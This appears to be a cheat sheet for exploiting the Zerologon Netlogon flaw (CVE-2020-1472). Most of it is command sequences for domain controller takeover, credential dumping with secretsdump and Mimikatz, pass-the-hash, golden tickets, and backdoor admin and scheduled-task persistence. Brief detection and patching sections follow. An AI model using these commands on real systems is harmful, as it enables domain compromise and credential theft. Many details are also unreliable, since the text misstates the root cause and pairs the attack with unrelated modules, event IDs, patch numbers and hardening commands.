Zerologon (CVE-2020-1472)
Zerologon (CVE-2020-1472) is a critical vulnerability in Netlogon protocol authentication allowing unauthenticated domain controller compromise and complete domain takeover.
Vulnerability Details
- CVE: CVE-2020-1472
- CVSS: 10.0 (Critical)
- Affected: Windows Server 2008 R2 - 2019 (pre-patch)
- Attack Vector: Network/Unauthenticated
- Impact: Complete domain compromise
- Root Cause: Weak initialization vector (IV) in RC4 encryption
Prerequisites
- Network access to domain controller Netlogon port (445)
- Domain controller must not be patched
- No credentials required
- Can be exploited from workstations
Exploitation Methods
Metasploit Module
# Setup Metasploit
msfconsole
# Use Zerologon exploit
msf > use auxiliary/scanner/smb/smb_ms17_010
msf > set RHOSTS 192.168.1.100
msf > set RPORT 445
msf > run
# Alternative: Use specific zerologon module
msf > use exploit/windows/smb/zerologon_netlogon_rce
msf > set RHOSTS 192.168.1.100
msf > runPython Exploit (impacket-zerologon)
# Standalone Python exploit
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
# Run exploit against DC
python3 examples/zerologon_tester.py 192.168.1.100
# Full exploitation
python3 -m impacket.examples.secretsdump -just-dc-user-sam DOMAIN\\Administrator@192.168.1.100Cobalt Strike BOF (Beacon Object File)
# Load exploit in Beacon
beacon > inline-execute /path/to/zerologon.bin 192.168.1.100
# Set DC name
beacon > inline-execute /path/to/zerologon.bin DC_NAME 192.168.1.100
# Verify exploitation
beacon > execute net group "Domain Computers" /domainExploitation Stages
Stage 1: Netlogon Handshake Bypass
# Test vulnerability
python3 zerologon_tester.py 192.168.1.100
# Output indicates vulnerability if successful:
# [*] Target vulnerable
# [+] Netlogon authentication succeededStage 2: Secure Channel Establishment
# Python code to establish secure channel
from impacket import nrpc
# Connect to DC
dc_name = '192.168.1.100'
computer_name = 'WORKSTATION'
# Perform Netlogon handshake (vulnerable)
# IV set to zeros (vulnerability)Stage 3: Machine Account Takeover
# Reset machine account password
python3 -m impacket.examples.secretsdump -just-dc DOMAIN\\DC@192.168.1.100
# Credentials obtained:
# domain\DC$:hashStage 4: Domain Compromise
# Use compromised machine account for lateral movement
psexec.exe -u DOMAIN\\DC$ -p hash \\target cmd.exe
# Extract complete Active Directory database
python3 secretsdump.py -just-dc-user-sam DOMAIN\\Administrator@192.168.1.100Complete Attack Chain
Option 1: Password Reset Attack
#!/bin/bash
# Zerologon complete exploitation
DC_NAME="DC01"
DC_IP="192.168.1.100"
DOMAIN="DOMAIN.LOCAL"
# Step 1: Test vulnerability
python3 zerologon_tester.py $DC_IP
# Expected: [*] Target vulnerable
# Step 2: Reset machine account password
python3 zerologon_exploit.py $DC_NAME $DC_IP
# Step 3: Extract credentials
python3 secretsdump.py -just-dc $DOMAIN\\$DC_NAME\\$@$DC_IP
# Step 4: Restore original password
# (Important for stealth - prevent breaking DC)Option 2: Domain Controller Takeover
# Gain SYSTEM on DC directly
meterpreter > getsystem
meterpreter > getuid
# uid=SYSTEM
# Dump credentials
meterpreter > load kiwi
meterpreter > creds_all
# Extract domain database
meterpreter > shell
> ntdsutil
> activate instance NTDS
> ifm
> create full c:\snapshot
> quitCredential Extraction Post-Exploitation
From Compromised DC
# Using impacket secretsdump
python3 secretsdump.py -just-dc DOMAIN\\DC@192.168.1.100 -output domain_hashes
# Using Metasploit
msf > use auxiliary/admin/smb/ntds_filehunt
msf > set RHOSTS 192.168.1.100
msf > run
# Using Mimikatz
beacon > execute mimikatz.exe lsadump::dcsync /domain:DOMAIN /user:krbtgt
# Results: All domain users + hashesSpecific Credential Targeting
# Extract Domain Admin hashes
secretsdump.py DOMAIN/DC$:password@192.168.1.100 -just-dc-user-sam | grep -i "500"
# Extract krbtgt (for golden tickets)
secretsdump.py DOMAIN/DC$:password@192.168.1.100 -just-dc-user-sam | grep krbtgt
# Extract ALL users
secretsdump.py DOMAIN/DC$:password@192.168.1.100 -just-dc-user-sam > domain_hashes.txtLateral Movement After Exploitation
Using Extracted Credentials
# Pass-the-Hash with Domain Admin
psexec.exe -u DOMAIN\\Administrator -p ntlmhash \\target cmd.exe
# Create golden ticket (krbtgt hash)
kerberos::golden /user:Administrator /domain:DOMAIN.LOCAL /sid:S-1-5-21-xxx /krbtgt:hash
# Domain-wide access
# All systems now compromisedPersistence
# Create backdoor domain admin
net user backdoor_admin Password123 /add /domain
net group "Domain Admins" backdoor_admin /add /domain
# Create custom SPN (hidden admin)
setspn -a invisible/backdoor DOMAIN\\backdoor_admin
# Scheduled task on DCs
schtasks /create /tn "System Maintenance" /tr "backdoor.exe" /sc onstart /ru SYSTEMDetection & Indicators
Network Signatures
- Multiple failed Netlogon authentication attempts
- Repeated connection attempts to port 445
- Unusual Netlogon session activity
Log Indicators
# Event 4768 - Kerberos TGT requested
# Event 4769 - Service ticket requested
# Event 4770 - Kerberos TGT renewed
# Event 4777 - Netlogon failure (if logged)Mitigation & Patching
Emergency Patches
# Microsoft security updates
# KB4557998 (Windows Server 2019)
# KB4557999 (Windows Server 2016)
# KB4558011 (Windows Server 2012 R2)
# Verify patch level
systeminfo | findstr "System Boot Time"
wmic qfe list | findstr KB455
# Force patch installation
wuauclt /forcefindnow
wuauclt /detectnowHardening Measures
# Enable Netlogon hardening registry key
reg add HKLM\System\CurrentControlSet\Services\Netlogon\Parameters /v FullSecureChannelProtection /t REG_DWORD /d 1
# Enforce LDAP channel binding
reg add HKLM\System\CurrentControlSet\Services\NTDS\Parameters /v LdapEnforceChannelBinding /t REG_DWORD /d 2
# Require SMB signing
net config server /autodisconnect:-1
reg add HKLM\System\CurrentControlSet\Services\LanmanServer\Parameters /v EnableSecuritySignature /t REG_DWORD /d 1Defensive Detection
Monitor for Exploitation Attempts
# Log Netlogon session changes
auditpol /set /subcategory:"Network Policy Server" /success:enable /failure:enable
# Monitor authentication failures
Get-WinEvent -LogName Security -FilterXPath "*[System[(EventID=4776)]]" |
Where-Object {$_.Message -like "*failure*"}Incident Response
# Verify if DC compromised
# 1. Check recent password changes
ntdsutil > activate instance ntds
> ifm
> create full c:\snapshot
# 2. Extract and analyze
secretsdump.py snapshot/NTDS.dit snapshot/SYSTEM.SAV
# 3. Check for golden tickets
dir \\dc\c$\Users\*\AppData\*\krb5.keytab
# 4. Audit admin changes
wevtutil qe Security /q:*[System[(EventID=4722)]]Post-Compromise Domain Recovery
Complete Domain Reset Required
- Isolate all domain controllers
- Assume complete compromise
- Reset all passwords (Domain Admins first)
- Revoke all Kerberos tickets
- Generate new krbtgt password
- Rebuild DC from secure backups
# Reset krbtgt password (Domain Admin)
Set-ADAccountPassword -Identity "CN=krbtgt,CN=Users,DC=domain,DC=local" \
-NewPassword (ConvertTo-SecureString -AsPlainText -Force "NewPassword123!") -Reset
# Force Kerberos ticket invalidation
Reset-ComputerMachinePasswordTools Reference
| Tool | Purpose | Usage |
|---|---|---|
| zerologon_tester.py | Vulnerability detection | python3 zerologon_tester.py DC_IP |
| zerologon_exploit.py | Exploitation | python3 zerologon_exploit.py DC_NAME DC_IP |
| secretsdump.py | Credential extraction | secretsdump.py DOMAIN/DC$@DC_IP -just-dc |
| Metasploit | Multi-purpose exploitation | use exploit/windows/smb/zerologon |
CVSS and Severity
- CVSS 3.1 Score: 10.0 (Critical)
- Attack Complexity: Low
- Privilege Required: None
- User Interaction: None
- Scope: Unchanged
- Impact: Complete System Compromise
Timeframe for Patching
- Critical: Patch immediately
- Exposed Systems: Assume breach and investigate
- Post-Patch: Monitor for exploitation signs
- Backup Recovery: From pre-compromise date